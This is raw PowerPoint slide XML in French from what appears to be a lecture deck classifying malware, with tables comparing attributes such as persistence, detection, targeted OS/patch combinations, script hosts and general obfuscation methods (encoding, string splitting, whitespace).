          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3639736" y="2080008"/>
          <a:ext cx="8128000" cy="2961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813187492"/>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2720333836"/>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977224267"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Moyenne</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Très haute</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="486711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Moyenne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Très haute</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4283291729"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Moyenne</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Basse</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2222012658"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="242493804"/>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26" y="2760310"/>
            <a:ext cx="486477" cy="486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22" y="3246787"/>
            <a:ext cx="360035" cy="36003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426" y="3606822"/>
            <a:ext cx="414231" cy="414231"/>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622" y="4339664"/>
            <a:ext cx="360035" cy="360035"/>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1711290900"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1680306" y="2074928"/>
          <a:ext cx="1143279" cy="296672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Code source</a:t>
                      </a:r>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Fichier</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2084593043"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Procès</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3214466422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Complexité</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403847838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Détection</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="272654546"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Persistance</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2656580963"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2300699035"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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387" y="3979629"/>
            <a:ext cx="401459" cy="401459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014504" y="253812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ight Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2996638" y="2946229"/>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ight Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014504" y="3369485"/>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ight Arrow 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3029898" y="3696313"/>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ight Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042177" y="4065721"/>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ight Arrow 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3026783" y="4435129"/>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02772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a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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23" y="2368554"/>
            <a:ext cx="414231" cy="414231"/>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678523662"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3639736" y="2080008"/>
          <a:ext cx="8128000" cy="3779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813187492"/>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2720333836"/>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977224267"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Moyenne</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Très haute</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="486711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Moyenne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Très haute</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4283291729"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Moyenne</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" smtClean="0"/>
                        <a:t>Basse</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2222012658"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Exécutables</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Script intégré dans un format qui exécute des scripts (PDF, Word, Excel etc.)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>JavaScript</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>WMI</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>PowerShell</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
                        <a:t>Wscript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
                        <a:t>CScript</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="242493804"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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426" y="2760310"/>
            <a:ext cx="414231" cy="4142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916" y="3209829"/>
            <a:ext cx="289697" cy="28969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426" y="3537468"/>
            <a:ext cx="441328" cy="44132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22" y="4341723"/>
            <a:ext cx="387132" cy="387132"/>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523" y="4736648"/>
            <a:ext cx="409137" cy="409137"/>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3208449292"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1680306" y="2074928"/>
          <a:ext cx="1143279" cy="311404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Code source</a:t>
                      </a:r>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Fichier</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2084593043"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Procès</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3214466422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Complexité</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403847838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Détection</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="272654546"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Persistance</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2656580963"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Type de fichiers</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2300699035"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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1916" y="4020189"/>
            <a:ext cx="313741" cy="313741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014504" y="253812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ight Arrow 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014504" y="2974842"/>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ight Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014504" y="329735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ight Arrow 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3039878" y="3691262"/>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ight Arrow 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3039878" y="4062422"/>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ight Arrow 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3040994" y="4477970"/>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ight Arrow 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014757" y="4901715"/>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3317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 2</a:t>
            </a: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2701278926"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3639736" y="2080008"/>
          <a:ext cx="8128000" cy="2367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Cible</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>une combinaison unique OS/patch.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Peut cibler de nombreuses combinaisons différentes OS/patch</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="813187492"/>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720333836"/>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977224267"/>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86711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4283291729"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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155" y="2378652"/>
            <a:ext cx="434888" cy="434888"/>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2832947167"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1680306" y="2074928"/>
          <a:ext cx="1143279" cy="237236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Cibles</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3069284132"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2084593043"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3214466422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403847838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="272654546"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3005571" y="2596096"/>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20491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 2</a:t>
            </a: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2131106517"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3650694" y="1959428"/>
          <a:ext cx="8128000" cy="355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Cible</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>une combinaison unique OS/patch.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Peut cibler de nombreuses combinaisons différentes OS/patch</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="813187492"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Cryptage</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Archivage </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Exécutable déguisé </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Exécutable intégré dans un autre fichier</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Encodage</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Valeurs ASCII/Unicode échappées</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Fractionnement des chaînes de caractères</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Cryptage </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Randomisation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Obfuscation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> de données</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Obfuscation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> de la structure logique</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Espace blanc</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2720333836"/>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977224267"/>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86711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4283291729"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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25" y="2248023"/>
            <a:ext cx="540017" cy="5400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14" y="3369337"/>
            <a:ext cx="448828" cy="44882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212373682"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1711371" y="1959428"/>
          <a:ext cx="1143279" cy="358648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Cibles</a:t>
                      </a:r>
                    </a:p>
                    <a:p>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Offuscation</a:t>
                      </a:r>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a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2084593043"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
